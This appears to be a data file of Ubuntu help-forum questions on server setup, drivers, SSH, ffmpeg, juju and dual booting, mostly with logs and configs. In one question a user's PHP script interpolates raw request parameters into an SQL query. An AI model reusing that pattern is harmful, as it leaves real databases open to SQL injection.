341707	apache apr on ubuntu 12.10 not starting	i have followed similar steps and got it working on windows . here is my connector and listner in apache tomcat 's server.xml : < connector executor= '' tomcatthreadpool '' port= '' 8080 '' protocol= '' org.apache.coyote.http11.http11aprprotocol '' connectiontimeout= '' -1 '' redirectport= '' 8443 '' acceptcount= '' 10000 '' maxconnections= '' -1 '' maxkeepaliverequests= '' -1 '' / > ... < listener classname= '' org.apache.catalina.core.aprlifecyclelistener '' sslengine= '' off '' / > when i run sh configtest.sh configtest i get : using catalina_base : /home/abhijit/apache-tomcat-7.0.42 using catalina_home : /home/abhijit/apache-tomcat-7.0.42 using catalina_tmpdir : /home/abhijit/apache-tomcat-7.0.42/temp using jre_home : /usr/lib/jvm/java-7-oracle using classpath : /home/abhijit/apache-tomcat-7.0.42/bin/bootstrap.jar : /home/abhijit/apache-tomcat-7.0.42/bin/tomcat-juli.jar sep 05 , 2013 5:46:44 pm org.apache.catalina.core.aprlifecyclelistener init info : loaded apr based apache tomcat native library 1.1.27 using apr version 1.4.8 . sep 05 , 2013 5:46:44 pm org.apache.catalina.core.aprlifecyclelistener init info : apr capabilities : ipv6 [ true ] , sendfile [ true ] , accept filters [ false ] , random [ true ] . sep 05 , 2013 5:46:44 pm org.apache.coyote.abstractprotocol init info : initializing protocolhandler [ `` http-apr-8080 '' ] sep 05 , 2013 5:46:44 pm org.apache.coyote.abstractprotocol init info : initializing protocolhandler [ `` ajp-apr-8009 '' ] sep 05 , 2013 5:46:44 pm org.apache.catalina.startup.catalina load info : initialization processed in 587 ms but when i start tomcat , it does n't start and my netstat -ntlp | grep listen does n't show port 8080 ( tomcat ) : ( not all processes could be identified , non-owned process info will not be shown , you would have to be root to see it all . ) tcp 0 0 192.168.0.135:6379 0.0.0.0 : * listen 13558/redis-server tcp 0 0 127.0.0.1:6379 0.0.0.0 : * listen 13558/redis-server tcp 0 0 0.0.0.0:139 0.0.0.0 : * listen - tcp 0 0 127.0.1.1:53 0.0.0.0 : * listen - tcp 0 0 127.0.0.1:631 0.0.0.0 : * listen - tcp 0 0 0.0.0.0:445 0.0.0.0 : * listen - tcp6 0 0 : ::139 : : : * listen - tcp6 0 0 : ::445 : : : * listen - please ask if anything else is needed . thank you .
341712	how to add malayalam keyboard layout in kubuntu ?	i ca n't see a malayalam keyboard layout in my kubuntu 13.04 's keyboard settings . only bengali from indian languages available . someone please tell me how to update the list of keyboard layouts .
341719	lenovo x1 carbon is not charging battery even if plugged into ac	i installed ubuntu 13.04 on my x1 carbon touch laptop yesterday and everything worked fine , the battery charged as usual . today i 've noticed that the battery indicator shows me that i am working on battery power even if i plug power adapter into ac and led on the left side of the laptop ( near the power connector ) is green . i tried to use tpl tools as described somewhere on this site to set start and stop discharge thresholds but it does not help . the only way to charge the battery is to shutdown laptop completely ( not suspend ) and wait for a couple hours . which is not so great though . : )
341726	apache - the var/www has root as owner	i have downloaded apache on ubuntu by following this tutorial . it installed the apache nicely and it is running successfully but there is one problem which is a huge one . i do not have permissions to write to /var/www folder although i am administrator . the current owner of that www folder is root . i have installed ubuntu today so i do n't know much about it . i have used chown command but it throws error : operation not permitted . can anybody tell me so that i can have read & write permissions ?
341728	unable to use new sata 3tb drive in ubuntu 12.04	i bought a new seagate 3tb sata-ii hd . i installed it in the computer myself . the disks program in ubuntu recognizes the hd . when i try to create a partition table in disks , i get this error : error creating partition table : helper exited with exit code 1 : error calling fsync ( 2 ) on /dev/sdb : input/output error here is the output of fdisk -l : disk /dev/sda : 500.1 gb , 500107862016 bytes 255 heads , 63 sectors/track , 60801 cylinders , total 976773168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x0005dd31 device boot start end blocks id system /dev/sda1 * 2048 9764863 4881408 83 linux /dev/sda2 9766910 976771071 483502081 5 extended partition 2 does not start on physical sector boundary . /dev/sda5 9766912 107421695 48827392 83 linux /dev/sda6 107423744 974817279 433696768 83 linux /dev/sda7 974819328 976771071 975872 82 linux swap / solaris disk /dev/sdc : 320.1 gb , 320072933376 bytes 255 heads , 63 sectors/track , 38913 cylinders , total 625142448 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 512 bytes i/o size ( minimum/optimal ) : 512 bytes / 512 bytes disk identifier : 0xc27c4f8f device boot start end blocks id system /dev/sdc1 2048 625137344 312567648+ c w95 fat32 ( lba ) disk /dev/sdb : 3000.6 gb , 3000592982016 bytes 255 heads , 63 sectors/track , 364801 cylinders , total 5860533168 sectors units = sectors of 1 * 512 = 512 bytes sector size ( logical/physical ) : 512 bytes / 4096 bytes i/o size ( minimum/optimal ) : 4096 bytes / 4096 bytes disk identifier : 0x00000000 disk /dev/sdb does n't contain a valid partition table i have tried gparted but it fails as well . any help ? could this be a sata data cable issue ?
341730	ubuntu on hp pavilion g7 1153er with hybrid radeon 6470m and intel 3000	i will start this thread like most of people . i am new guy in ubuntu . i have tried to make right installation but always getting some problems . i have laptop hp pavilion g7 1153er . this laptop equipped with ati radeon hd 6470m and i5 2410m cpu so i have hybrid graphic with intel hd video 3000 . i have took this laptop with windows . but i am working with web-services and developement a lot so would like change my os to ubuntu . i have started with ubuntu 12.04 and got that my system doesnt want to start up without additional parameter nomodeset . i have used it , install os and thought that problem is with radeon . so i have installed ( from 7 time reinstalled os ) driver from amd site . but this is n't help . when i checked my logs i see that main problem is with intel video . fatal server error : [ 18.145 ] atiddxprobe : fail to probe intel vga device [ 18.145 ] ( ee ) please consult the the x.org foundation support for help . [ 18.145 ] ( ee ) please also check the log file at `` /var/log/xorg.0.log '' for additional information . [ 18.146 ] ( ee ) i checked intel drivers and saw that they are adapted to ubuntu 13.04 now . so i have tried few times install them to ubuntu 12.04 and failed . to move further i have installed ubuntu 13.04 . this system required two additional boot parameters to work : acpi=off and nomodeset . i have installed and seen that it works with slow screen processing . than i installed intel driver and this helped to me remove acpi=off from boot string . i have digged a lot of info to check all this things like a new user . i know that experience it is great but i am trying to solve this problem third day and my work is stopped . do not want to switch back so could any body help me to find solution for video processing speed . i still thinking that problem is with drivers . what is the best in my situation ? and do i need to use nomodest for each start up ? please help me with this problem or post some links for similar problem . i have checked many posts but problems was little bit different . sorry for my english and thanks . maybe this will help . uname -a linux w-hp-pavilion-g7 3.8.0-19-generic # 30-ubuntu smp wed may 1 16:35:23 utc 2013 x86_64 x86_64 x86_64 gnu/linux lspci -k | grep vga -a2 00:02.0 vga compatible controller : intel corporation 2nd generation core processor family integrated graphics controller ( rev 09 ) subsystem : hewlett-packard company device 1672 00:16.0 communication controller : intel corporation 6 series/c200 series chipset family mei controller # 1 ( rev 04 ) -- 01:00.0 vga compatible controller : advanced micro devices [ amd ] nee ati seymour [ radeon hd 6400m/7400m series ] subsystem : hewlett-packard company device 1672 02:00.0 network controller : broadcom corporation bcm4313 802.11b/g/n wireless lan controller ( rev 01 ) i have move further and tried to install amd driver ... . thought it will help . after generation of xorg.config and reboot i have got again error in xorg atiddxprobe : fail to probe intel vga device after revert xorg.config to backup i was able to start ubuntu but the desktop was empty . i have tried to start unity but got another error compiz ( core ) - error : plugin 'opengl ' not loaded . completely confused ... ... . continuing searching solution . tried installed drivers few more time with different instructions for 13.04 and 12.04 as well . i have seen some statistic that each time when i am generating xorg.conf after radeon drivers preparation i get graphic error about intel adapter ( please check this error examples above , they are the same ) . and when i completely remove xorg.conf or choose back to default setting ( make the same : remove xorg.conf ) than everything works again . all this time use nomodeset for ubuntu start up , without it getting black screen . searching solution at few forums but havent got any suggestion . i have feeling that it is impossible to fix this problem . : )
341731	unable to connect to remote server with ssh	i used to connect to my server without any problem using ssh on ubuntu with this command : ssh username @ server-ip i can no longer do it now i 've changed my location ( same pc ) . whene i run the same command using the -v parameter , it outputs me this : openssh_6.0p1 debian-3ubuntu1 , openssl 1.0.1c 10 may 2012 debug1 : reading configuration data /etc/ssh/ssh_config debug1 : /etc/ssh/ssh_config line 19 : applying options for * debug1 : connecting to xx.xx.xx.xxx [ xx.xx.xx.xxx ] port 22. debug1 : connection established . debug1 : identity file /home/riless/.ssh/id_rsa type 1 debug1 : checking blacklist file /usr/share/ssh/blacklist.rsa-2048 debug1 : checking blacklist file /etc/ssh/blacklist.rsa-2048 debug1 : identity file /home/riless/.ssh/id_rsa-cert type -1 debug1 : identity file /home/riless/.ssh/id_dsa type -1 debug1 : identity file /home/riless/.ssh/id_dsa-cert type -1 debug1 : identity file /home/riless/.ssh/id_ecdsa type -1 debug1 : identity file /home/riless/.ssh/id_ecdsa-cert type -1 debug1 : remote protocol version 2.0 , remote software version openssh_5.5p1 debian-6+squeeze3 debug1 : match : openssh_5.5p1 debian-6+squeeze3 pat openssh_5* debug1 : enabling compatibility mode for protocol 2.0 debug1 : local version string ssh-2.0-openssh_6.0p1 debian-3ubuntu1 debug1 : ssh2_msg_kexinit sent debug1 : ssh2_msg_kexinit received debug1 : kex : server- > client aes128-ctr hmac-md5 none debug1 : kex : client- > server aes128-ctr hmac-md5 none debug1 : ssh2_msg_kex_dh_gex_request ( 1024 < 1024 < 8192 ) sent debug1 : expecting ssh2_msg_kex_dh_gex_group and then after a while : connection closed by xx.xx.xx.xxx what is the problem , and how can i solve it ? edit : ps : it works on putty , but not with openssh
341737	bitrate settings are not consistent ffmpeg	how do i change the bitrate for both the video & audio together in one line ? was frustrated with avconv not doing something right so i was messing around with ffmpeg to see if i could circumvent the problem i was having with avconv . if its not one thing its something else . the command ffmpeg -v verbose -i inputfile.mkv -map 0.0 -vcodec mpeg2video -b : v 6000k -map 0.1 -acodec ac3 -b : a 384k -ac 2 -map_metadata 0:0 outputfile.mpg ignores the bitrate settings and produces error about the parameter value but does n't produce errors about parameter syntax . ffmpeg version 0.8.6-6:0.8.6-1ubuntu2 input # 0 , matroska , webm , from 'inputfile.mkv ' : duration : 02:10:06.70 , start : 0.000000 , bitrate : 896 kb/s stream # 0.0 : video : h264 ( high ) , yuv420p , 1280x544 , par 1:1 dar 40:17 , 24 fps , 24 tbr , 1k tbn , 48 tbc ( default ) stream # 0.1 ( chi ) : audio : ac3 , 48000 hz , 5.1 , s16 , 448 kb/s ( default ) metadata : title : 粵語 stream # 0.2 ( chi ) : audio : ac3 , 48000 hz , 5.1 , s16 , 448 kb/s metadata : title : 国语 stream # 0.3 ( chi ) : subtitle : dvdsub ( default ) metadata : title : 繁中 stream # 0.4 ( chi ) : subtitle : [ 0 ] [ 0 ] [ 0 ] [ 0 ] / 0x0000 metadata : title : 繁中 stream # 0.5 ( chi ) : subtitle : dvdsub metadata : title : 简中 stream # 0.6 ( eng ) : subtitle : dvdsub metadata : title : eng [ buffer @ 0x1c9fda0 ] w:1280 h:544 pixfmt : yuv420p incompatible sample format 's16 ' for codec 'ac3 ' , auto-selecting format 'flt' [ ac3 @ 0x1c6df60 ] channel_layout not specified [ ac3 @ 0x1c6df60 ] no channel layout specified . the encoder will guess the layout , but it might be incorrect . [ ac3 @ 0x1c6df60 ] invalid bit rate output # 0 , mpeg , to 'outputfile.mpg ' : stream # 0.0 : video : mpeg2video , yuv420p , 1280x544 [ par 1:1 dar 40:17 ] , q=2-31 , 200 kb/s , 90k tbn , 24 tbc ( default ) stream # 0.1 ( chi ) : audio : ac3 , 48000 hz , stereo , flt , 200 kb/s ( default ) metadata : title : 粵語 stream mapping : stream # 0.0 - > # 0.0 stream # 0.1 - > # 0.1 error while opening encoder for output stream # 0.1 - maybe incorrect parameters such as bit_rate , rate , width or height if i change the bitrate parameter syntax to not be specific about video/audio then they both get set to the latter setting . ffmpeg -v verbose -i inputfile.mkv -map 0.0 -vcodec mpeg2video -b 6000k -map 0.1 -acodec ac3 -b 384k -ac 2 -map_metadata 0:0 outputfile.mp starts to convert but with an improper bitrate for the video . output # 0 , mpeg , to 'outputfile.mpg ' : metadata : encoder : lavf53.21.1 stream # 0.0 : video : mpeg2video , yuv420p , 1280x544 [ par 1:1 dar 40:17 ] , q=2-31 , 384 kb/s , 90k tbn , 24 tbc ( default ) stream # 0.1 ( chi ) : audio : ac3 , 48000 hz , stereo , flt , 384 kb/s ( default ) metadata : title : 粵語 stream mapping : stream # 0.0 - > # 0.0 stream # 0.1 - > # 0.1
341739	ubuntu 12.10 stop updating	i`v been using ubuntu 12.10 for a while now an never had an issue with updates until recently it just stop updating when i check for updates manually in the software updater it gives me the following error every time : w : failed to fetch gzip : /var/lib/apt/lists/partial/jm.archive.ubuntu.com_ubuntu_dists_precise-updates_main_i18n_translation-en , e : some index files failed to download . they have been ignored , or old ones used instead . can some please help me ? ?
341745	what is the best open source log server software	what is the best open source software to set up log server in linux ? it is better to have the function to let admin to customize the module , eg i want to add a new item for a specific log ( eg , crontab log or some other application logs ) , or i can sort the log form the web portal according to the services , hosts , ports . ps : sorry for any confusion and thanks for the prompt reply . what i want is : 1 ) the software has web portal as a dashboard to check all the logs collected . 2ďźthe software can be customised manually to meet the requirement , eg we can add a item for a specified service like our own application or something else . very appreciated !
341752	moving file from folder 1 to folder 2 in terminal	i am trying to move a text file from folder 1 to folder 2 via terminal . i 'm doing this for a school project to show what actually happens when you copy paste . i 'm doing cp/home/rits/desktop/folder1 cp/home/rits/desktop/folder2 and i get rits @ w : ~ $ cp/home/rits/desktop/folder1 bash : cp/home/rits/desktop/folder1 : no such file or directory tits @ w : ~ $ if you guys can help me out or have any other commands to show how to do basic things like formatting a usb , deleting a file , making a new folder , copying and pasting , moving files via terminal please comment .
341756	ip address if pc is taken on remote	if i take a pc on remote and send a mail through that pc whhich is on remote . then hat ip address the mail will be sent from . say i take pc b on remote through pc a and send a mail through pc b 's remote connection which ip will the mail receiving end detect .
341772	problem excluding subdirectories after including their parent in duplicity	i am backing up with something very similar to the below : /usr/bin/duplicity ( irrelevant options ) \ -- include /home/me \ -- exclude /home/me/example \ ssh : //remote/backupjar the problem i have is that the excluded example subdirectory is being included in my backups . even after explicitly giving an option to exclude it . the output shows : a : /home/me a : /home/me/otherstuff a : /home/me/example a : /hmoe/me/example/undesired-file
341774	how to send dhcpd lease & mac address info to central syslog server ?	i am looking to send dhcpd leases including mac address info etc . to my remote central syslog server , the server running dhcpd is running syslog-ng ... would someone be so gracious as to assist me with some guidance on how to configure this properly in the dhcpd.conf and/or syslog-ng.conf ? currently all logs on this server running dhcpd are configured via syslog-ng.conf to send to my central syslog server but i 'm not getting the lease and detailed mac address info etc that i am looking for ... only very sparse logs with random source ip 's only . thanks so much in advance !
341775	required file is missing	i am try to set up ubuntu as dual-boot on my win 8 laptop . i downloaded unetbootin to my hard drive and when i try to boot it , it says a required file is missing . i do n't get to any other screen .
341776	how to connect to a mysql database using web browser	i 'm thinking of creating my own comic book database on ubuntu . i have some experience in commmunicating to a db through a webbrowser but the problem is that i 've done that for a schoolproject on asp.net.. but because i use ubuntu a whole lot more than windows , i would like to know what the best technologies are to create such a program . basically i want the possibilities to query the db through my webbrowser . my guess is to use apache2 for the html but i 'm not quite sure what to use as db and how i can configure apache to communicate with that db . does someone have some experience to guide my in the right direction ? thanx ! -- edit 2 december i 'm having some problems with getting the data from the html fields . this is how it looks in html < label for= '' seriesname '' > < span > series < /span > < input class= '' searchfieldalign '' type= '' text '' name= '' seriesname '' / > < /label > < label for= '' volumename '' > < span > volume < /span > < input class= '' searchfieldalign '' type= '' text '' name= '' volumename '' / > < /label > < label for= '' issuenr '' > < span > nr < /span > < input class= '' searchfieldalign '' type= '' text '' name= '' issuenr '' / > < /label > this is my php script : < ? php $ seriesname = $ _request [ 'seriesname ' ] ; $ volumename = $ _request [ 'volumename ' ] ; $ issuenr = $ _request [ 'issuenr ' ] ; $ con=mysqli_connect ( `` localhost '' , '' user '' , '' psswd '' , '' db '' ) ; // check connection if ( mysqli_connect_errno ( ) ) { echo `` failed to connect to mysql : `` . mysqli_connect_error ( ) ; } $ qryissueinfo = mysqli_query ( $ con , '' select issuenr , issuevolume , issuename , issueimageurl from issue , series where seriesname= $ seriesname and issuevolume= $ volumename and issuenr= $ issuenr '' ) ; $ rowissueinfo = mysqli_fetch_array ( $ qryissueinfo ) ; the problem is i do n't get output from my query . there are no problems if i change it to this : $ qryissueinfo = mysqli_query ( $ con , '' select issuenr , issuevolume , issuename , issueimageurl from issue , series where seriesname='buffy , the vampire slayer ' and issuevolume= 'season 8 ' and issuenr=1 '' ) ; any ideas ?
341778	compatible android devices with ubuntu	what android phones and tablets are compatible with ubuntu ?
341779	how to turn off bluetooth ?	i want to turn off bluetooth . it seems to be turned off already , but every boot it appears at the panel again . here is how it looks at settings .
341787	connected my phone to ubuntu , all my files on external sd card are now gone	i just updated my ubuntu to the latest version , 13.04 , and i wanted to transfer some files to my galaxy s2 ( i9100 ) . i have had problem earlier which included slow transfer speed and i got 4 dialog screens wanting me to connect both the internal and external sd-card instead of 2 . when i tried to transfer my files to my external sd card i got an error message , error creating directory : input/output error i thought that it was weird but since i was in a hurry i did n't have time for it . i opened my audio map on the computer but i did n't see any files there . i thought it was just my computer being slow so i disconnected my phone . when i later tried to listen to music i could n't find any with apollo so i opened a file manager and i could n't see my files there either . i restarted my phone but the music is still not showing . i also found out that also all my pictures are gone from the external sd-card .
341789	sound disabled on user login ( works for guest and at login screen )	i 'm using ubuntu 12.04 on a lenovo ultrabook u410 . recently i changed the location of home directory to a bigger partition . i used rsync to copy the files and then edited fstab to auto-mount that partition . ever since , the sound in my user accounts has been disabled . i can see that sound works when the computer boots and login screen shows up . even when i login as a guest , everything works fine . but the sound for the user profile is gone . i tried creating a new user profile , but got the same result . the volume rocker in the sound settings is greyed out .
341793	how to determine if new hardware is compatible ?	i am looking to purchase a new laptop but do not want to run windows . in order to utilize both the new laptop and ubuntu to their fullest , i want to verify that the hardware is fully compatable with the os . is there a compatability matrix available that can be used to verify this ? does the hardware need to support open drivers or something similar ? please forgive my ignorance , as i have minimal experience managing/installing/trobleshooting linux installations . any assistance is greatly appreciated .
341794	command line not working	after i initially installed ubuntu , i can run 'll ' in my terminal . but after i checked a `` run command as login shell '' in terminal preferences i can not run `` ll '' command any more in terminal . something i am missing ? thanks
341795	is it possible to develop an app for ubuntu with c ( not c++ ) ?	i just want to know if i can write gui apps for ubuntu using c -- again , not c++ . it 's just that i hate having to learn a new language entirely ( i know that they are similar in some ways but still ) . just want to know thanks in advance .
341797	i want to execute a terminal command using php ?	i have tried exec , shell_exec , system , but they did n't work for me . the command i want to execute is as follows : ./toolkits/collaborative_filtering/svdpp -- training=/home/zubair/graphchi_v0.2.6/graphchi/smallnetflix_mm.train.txt -- validation=/home/zubair/graphchi_v0.2.6/graphchi/smallnetflix_mm.validate.txt -- binary_relevance_thresh=4 -- sgd_gamma=1e-6 -- max_iter=30 -- quiet=1 -- sgd_step_dec=0.9999 -- sgd_lambda=1e-6 -- d=3 -- minival=1 -- maxval=10`
341798	gedit select text and just highlight it plugin	does anyone know how to highlight some text or change its color in gedit 3.4.1 ? i have a list of features or modules to include in my project and i just want to mark each as solved when am done with it . just a simple highlight or color change will do . thanxs .
341806	my webcam is upside down whenever i use it	tried googling , did n't work . so , i 'm using ubuntu 13.04 . my webcam is an integrated asus . and i do n't really know what i 'm doing . if there is some software that would allow me to , like flip my video ( like many cam for ubuntu ) or some command that i could use that would just intercept the data from my webcam and flip it then i 'd love you .
341810	add user to group which can access network interfaces	i am currently setting up an ids ( suricata ) , which currently only runs as sudo due to when running as a user it can not access/change the network interface settings . is there a way you add a user to a group which can access network interfaces or is there an alternative secure solution which solve my issue ?
341811	intel haswell strange graphics and boot issue	i build a new system with a core i5-4570s cpu and i use the internal graphics card . i can install ubuntu 13.04 without problem and everything seems to work fine , but during boot and when i turn the pc off i see some really strange colors on the screen , kind of blue and the colors seem to be moving . do i have to worry about this ? once i am in the unity/gnome desktop this does not occur . the card seem to be recognised : 00:02.0 vga compatible controller : intel corporation haswell integrated graphics controller ( rev 06 ) i am using this kernel : 3.8.0-30-generic # 44-ubuntu smp thu aug 22 20:52:24 utc 2013 x86_64 x86_64 x86_64 gnu/linux the second problem just came up . i did and update today , there was a new kernel . after this update the machine does not show the lightdm login screen , just a blinking cursor . when i do ctrl+alt+f2 and restart the lightdm it gives me the login screen . what can i do ? do you need more info ?
341822	how do i report my laptop freezing ?	i 'm running ubuntu 13.04 on a lenovo x220 . my computer locks up half a dozen times a week . music still plays from the speakers ( rhythmbox ) ctrl+alt+f1 does nothing . unplugging the second monitor does nothing . unpluging peripherals does nothing . i am forced to hard reboot using the power button . i want to report this as a crash , or at least as a severe problem . how can i do this in a way that is useful to somebody ?
341824	which application binds a keyboard shortcut	i just found a wonderful keyboard shortcut . press ctrl+shift+prtscr and the mouse cursor will turn into a cross which allows you to mark a rectangle of the screen ( by left click-hold , drag , release -- you will see a visual rectangle ) and it will save that part of the screen into the copy & paste buffer . now , while that is very useful , i ca n't seem to figure out which program is responsible for this feature . my question is : how do i find which mechanism ( software ) is catching my keystroke ? i am running ubuntu 12.04 lts .
341825	unable to install ubuntu/ or linux distribution from usb	i assembled a new computer and first installed windows 8 . when i then try to install ubuntu 12.04 i can see ubuntu loading and i reach upto a point where i can move the mouse pointer and i can see ubuntu logo , but nothing more happens and the machine freezes . points to consider : the computer is working with windows 8 . i have previously installed ubuntu on my system but now i can not install . i tried with different versions of ubuntu and also linux mint . because my old ubuntu ( 12.04 ) stopped working after i tried to install ati graphics drivers . so i deleted my old ubuntu partition and i am trying to install a new one . the bootable usb stick is working fine as i tried it on my friends laptop and it loaded a live session quickly . please help .
341826	10 gb files in home folder due to hidden files	i am using ubuntu 13.04 . my home folder is full of hidden files like .xauthority.xtmzzw , .xauthority.vebczw , .goutputstream-0h5ntw and some of these files are uninstalled software related files but not all . all these files ( including documents , desktop ) occupied 13.5 gb space of home folder . how can i remove unnecessary hidden files ?
341831	issue with booting/rebooting behavior when using a bootable sd card	so , here 's what i have : a bootable sd card , with a minimal ubuntu installation . a bootable usb stick , with exactly the same filesystem image . a shuttle pc ( much like the xs35v2 digital signage media player seen here ) . the shuttle pc has no internal storage at all , it relies entirely on bootable media , the grub partition is contained within the sd card and the usb stick . now , i 'm having issues when rebooting the shuttle pc , but only when running from the sd card . case 1 : if the system is turned off , turning it on with either the sd card or the usb stick plugged in works perfectly . case 2 : if the system is turned on , and a reboot command is issued ( this includes sudo reboot ( with and without the -- force flag ) , sudo shutdown -r now and sudo init 6 ) : case 2.1 : if it was running on the usb stick , it reboots just fine and i get back to the login prompt . case 2.2 : if it was running on the sd card , it shuts down fine , but when actually turning on again it shows the bios splash , but after that it gets stuck on a black screen with a blinking cursor . in this last situation described , i have no input at all ( i have tried ctrl+alt+f , ctrl+c , etc ) . however , if at this point i shut down the shuttle , and turn it on , it works perfectly ( as described in case 1 ) . here 's what i 've tried : enabled all kinds of grub flags , namely those of the form reboot=xxx where xxx can be bios , acpi , etc ... with no different results achieved . enabled all kinds of verbose flags but all i get is the blinking cursor on a black screen . i 've tried extracting the sd card from the shuttle right after getting the blinking cursor with the hope to extract a useful log , but it seems like no new logs are generated in either /var/log/boot.log or /var/log/dmesg . i 've made sure that the sd card is the only bootable media selected in the bios boot order i 've checked for potential bios options that could be causing trouble , to no avail . i 'm very confused because i do n't understand what the difference is between turning off and turning on the shuttle ( case 1 , which works fine both using the usb and sd ) and issuing a reboot command ( case 2 , which when using the sd card as described in case 2.2 fails ) . i appreciate any help i can get to figure this one out , and will provide any information as required .
341832	how can i use microsoft windows xp or 7 and ubuntu lts on same computer ?	i want to use windows xp and ubuntu lts on same pc . how can i do it ? and is ubuntu free os or we have to purchase it for proffesional or for best use ?
341833	stuttering virtualbox sound with windows 7 guest and ubuntu host	i have installed a windows 7 as virtualbox-guest . my ubuntu works as host . the sound is stuttering ugly . i tried to change that by changing the audio-controller to ich ac97 and install the driver downloaded from chip . result : after a restart nothing has changed , sound stutters like before . is there a way to get a proper sound ? the guest additions are installed and are working fine . this is the ubuntu host : these are the settings of the virtualbox-machine : win7 , 64bit
341836	volume control microsoft lifechat lx-3000	when i plug in my ms lifechat lx-3000 headphones into my usb drive into dell inspiron , i have to manually change the sound output to the headset . the sound will sometimes automatically transfer from the speakers to the headset , and sometimes it will not . if i leave the headphones plugged in and even have changed the output the headset , when i wake the computer from a suspend session , i do not have volume control . sound will still be coming from the headset , but when i change volume from my keyboard the volume remains the same . when i change the output to the speakers again , i have full control . is there a fix for this ? is there a setting or a configuration file i can change ? is this a known bug ?
341843	how to disable local network browsing ?	unlike many posters here , i would actually like to disable the ability to browse local network shares and hosts on the local network . through the file manager . in other words , when you click on `` network '' in the file manager , nautilus , or whatever , i do n't want to see anything . this used to be something i had to enable in years past , now it is default . i 've uninstalled network-manager , avahi and samba+samba-common and i still see hosts when i click on the network . how do i disable this ? a clarification : users need internet access , ok ? but i do n't want them to be able to view other devices and computers on the local area network . in windows 7 , i could choose `` public network '' , done . this disables file and print sharing as well as the ability to discover other computers in the network 'hood , as it were . many nixes do not have this enabled by default . how do i disable this in ubuntu ?
341844	'unable to mount new volume ' and 'unable to mount 202 gb filesystem ' in ubuntu 12.04.2	i am using ubuntu 12.04.2 on a live usb , after i restarted my system with bootable usb , when i try to open my harddisk , it shows -- unable to mount new volume error mounting : mount exited with exit code 21 : mount : according to mtab , /dev/sda3 is already mounted on /media/new volume . and unable to mount 202 gb filesystem error mounting : mount exited with exit code 21 : mount : according to mtab , /dev/sda2 is already mounted on /media/aece2545ce250765 and i am not even able to access my pendrives , i have some really important programs stored in live usb and i want to copy and paste it in the harddisk . please help ... thanks in advance
341845	juju hangs when connecting to mongo	whenever i run any juju activity which connects to mongodb , the connection seems to connect ok but hang . i 'm using the stable ppa and running on ubuntu 13.04 desktop . $ juju status -- debug 2013-09-05 18:03:09 info juju.environs.local environprovider.go:32 opening environment `` local '' 2013-09-05 18:03:09 debug juju.environs.local environ.go:218 found `` 10.0.3.1 '' as address for `` lxcbr0 '' 2013-09-05 18:03:09 debug juju.environs.local environ.go:242 checking 10.0.3.1:8040 to see if machine agent running storage listener 2013-09-05 18:03:09 debug juju.environs.local environ.go:245 nope , start some 2013-09-05 18:03:09 debug juju state.go:138 waiting for dns name ( s ) of state server instances [ localhost ] 2013-09-05 18:03:09 info juju open.go:69 state : opening state ; mongo addresses : [ `` 10.0.3.1:37017 '' ] ; entity `` '' below is the last few lines of /var/log/mongodb/mongodb.log thu sep 5 19:16:10 [ conn2 ] end connection 10.0.3.1:35529 ( 0 connections now open ) thu sep 5 19:16:17 [ initandlisten ] connection accepted from 10.0.3.1:35873 # 3 ( 1 connection now open ) juju just stays in this state refusing to do anything . version information : $ juju version 1.12.0-raring-amd64 $ mongo -- version mongodb shell version : 2.2.4 edit : mongo has auth disabled and is only running as a single node , ssl is off . i 'm not deploying mongodb , i 'm using a lxc to test charms i 'm building . mongodb is used by juju-local to hold lxc container state . here is my mongodb.conf : ( comments removed ) dbpath=/var/lib/mongodb logpath=/var/log/mongodb/mongodb.log logappend=true bind_ip = 0.0.0.0 port = 37017 journal=true
341846	is there any way to get cve or usn ids that need to be installed ?	i 'm looking to pull in what cve or usn ids that apply to a security update before doing them . is there any way ?
341847	how can i test wifi on a laptop from a live disc of ubuntu	i have an older single core amd laptop that i would like to run ubuntu on . i created a live cd and launched ubuntu without any problems . i hooked up my ethernet cable and found ubuntu responded very well and brought back my old laptop to life again ( has win xp and is very slow ) . i was n't able to figure out how to connect to my wireless network ( which worked under windows ) within ubuntu . can someone point me in the correct direction ? this is the first time i am using ubuntu or any linux os . thanks steve
341848	12.04/gnome3.4.2 windows/panels showing gray not white	i 'm super new to linux ( i got this machine 2 weeks ago ) so excuse me if i ask silly questions . i 'm not sure what might have triggered this , but lately i 've been seeing grey backgrounds instead of white in certain situations , particularly on web pages ( using firefox ) and the file browser . i 've been using the default theme . the only major change i 've made ( i think ) is installing a netflix application . i 've been looking around at similar cases and they all seem to be related to people changing their theme , which i have n't done . i 'm not sure what other information to offer , but please let me know if you need to know anything else . examples : any contributions are appreciated ! pam asus 1015-ds03 , ubuntu 12.04 64-bit , gnome 3.4.2
341856	filezilla question permission denied file transfer failed	i 'm using amazon web services to host my ubuntu lamp stack and i 'm new to this ( of course ) . i installed lamp and wordpress to use for my website using this tutorial : http : //iampuneet.com/wordpress-amazon-ec2/ i have completed this and everything seems to be running smoothly . i have access to the wordpress dashboard and i am attempting to upload a theme i purchased . now when i go to upload the theme i get this error : the uploaded file exceeds the upload_max_filesize directive in php.ini . so i 'm trying to add a php.ini file that increases the max upload size , however when i try to move the file into the /var/www/wp-admin directory i get this error : error : /var/www/wp-admin/php.ini : open for write : permission denied error : file transfer failed i am using an ec2 instance on aws , host : my ip address , username : ubuntu , no password and port 22 any idea what may need to be done here ? i have tried numerous ideas from googling this issue .
341862	im trying to install ubuntu onto a new hard drive on a 3 year old samsung i3 laptop .	ok i 'm trying to install ubuntu 12.04 onto a new hard drive . to laptop is only 3 years old but for some reason it will not recognize a usb or dvd and i cant find a cd that will hold the 708 mb file . any ideas how i can get this to work
341865	broadband not accessible	i 've installed ubuntu 13.04 along side windows 8 , both on different partition . and i 've 512kbps broadband connection of local operator with username & password enabled . i can smoothly connect to internet via windows 8 . but in ubuntu , it 's like a headache . i 've tried a lot but it 's not either connecting or giving internet access . can anybody help me out with this ? ? i really want to get rid out of this . thanks in advance ! !
